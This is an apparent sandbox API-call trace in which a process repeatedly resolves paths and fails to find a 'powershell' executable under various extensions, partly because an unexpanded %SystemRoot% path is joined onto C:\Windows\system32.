	[0392.555] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0392.555] SetErrorMode (uMode=0x1) returned 0x1
	[0392.555] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0392.563] SetErrorMode (uMode=0x1) returned 0x1
	[0392.564] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0392.564] SetErrorMode (uMode=0x1) returned 0x1
	[0392.564] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0392.572] SetErrorMode (uMode=0x1) returned 0x1
	[0392.574] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0392.574] SetErrorMode (uMode=0x1) returned 0x1
	[0392.574] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.081] SetErrorMode (uMode=0x1) returned 0x1
	[0393.082] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.082] SetErrorMode (uMode=0x1) returned 0x1
	[0393.082] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.088] SetErrorMode (uMode=0x1) returned 0x1
	[0393.089] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.090] SetErrorMode (uMode=0x1) returned 0x1
	[0393.090] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.097] SetErrorMode (uMode=0x1) returned 0x1
	[0393.098] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.098] SetErrorMode (uMode=0x1) returned 0x1
	[0393.098] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.105] SetErrorMode (uMode=0x1) returned 0x1
	[0393.106] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.106] SetErrorMode (uMode=0x1) returned 0x1
	[0393.106] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.113] SetErrorMode (uMode=0x1) returned 0x1
	[0393.580] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.580] SetErrorMode (uMode=0x1) returned 0x1
	[0393.580] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.588] SetErrorMode (uMode=0x1) returned 0x1
	[0393.590] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.590] SetErrorMode (uMode=0x1) returned 0x1
	[0393.590] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.599] SetErrorMode (uMode=0x1) returned 0x1
	[0393.600] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.600] SetErrorMode (uMode=0x1) returned 0x1
	[0393.601] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.609] SetErrorMode (uMode=0x1) returned 0x1
	[0393.610] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.611] SetErrorMode (uMode=0x1) returned 0x1
	[0393.611] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.617] SetErrorMode (uMode=0x1) returned 0x1
	[0393.618] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0393.618] SetErrorMode (uMode=0x1) returned 0x1
	[0393.618] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.969] SetErrorMode (uMode=0x1) returned 0x1
	[0393.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.971] SetErrorMode (uMode=0x1) returned 0x1
	[0393.971] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.971] SetErrorMode (uMode=0x1) returned 0x1
	[0393.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.971] SetErrorMode (uMode=0x1) returned 0x1
	[0393.971] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.972] SetErrorMode (uMode=0x1) returned 0x1
	[0393.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.972] SetErrorMode (uMode=0x1) returned 0x1
	[0393.972] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.972] SetErrorMode (uMode=0x1) returned 0x1
	[0393.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.972] SetErrorMode (uMode=0x1) returned 0x1
	[0393.972] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.973] SetErrorMode (uMode=0x1) returned 0x1
	[0393.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.973] SetErrorMode (uMode=0x1) returned 0x1
	[0393.973] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.973] SetErrorMode (uMode=0x1) returned 0x1
	[0393.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.973] SetErrorMode (uMode=0x1) returned 0x1
	[0393.974] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.974] SetErrorMode (uMode=0x1) returned 0x1
	[0393.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.974] SetErrorMode (uMode=0x1) returned 0x1
	[0393.974] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.974] SetErrorMode (uMode=0x1) returned 0x1
	[0393.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.975] SetErrorMode (uMode=0x1) returned 0x1
	[0393.975] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.975] SetErrorMode (uMode=0x1) returned 0x1
	[0393.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.975] SetErrorMode (uMode=0x1) returned 0x1
	[0393.975] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.975] SetErrorMode (uMode=0x1) returned 0x1
	[0393.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.976] SetErrorMode (uMode=0x1) returned 0x1
	[0393.976] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.976] SetErrorMode (uMode=0x1) returned 0x1
	[0393.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.976] SetErrorMode (uMode=0x1) returned 0x1
	[0393.976] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.976] SetErrorMode (uMode=0x1) returned 0x1
	[0393.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.977] SetErrorMode (uMode=0x1) returned 0x1
	[0393.977] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.977] SetErrorMode (uMode=0x1) returned 0x1
	[0393.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.977] SetErrorMode (uMode=0x1) returned 0x1
	[0393.977] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.977] SetErrorMode (uMode=0x1) returned 0x1
	[0393.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.978] SetErrorMode (uMode=0x1) returned 0x1
	[0393.978] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.978] SetErrorMode (uMode=0x1) returned 0x1
	[0393.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0393.978] SetErrorMode (uMode=0x1) returned 0x1
	[0393.978] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.978] SetErrorMode (uMode=0x1) returned 0x1
	[0393.979] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.979] SetErrorMode (uMode=0x1) returned 0x1
	[0393.979] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.979] SetErrorMode (uMode=0x1) returned 0x1
	[0393.979] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.979] SetErrorMode (uMode=0x1) returned 0x1
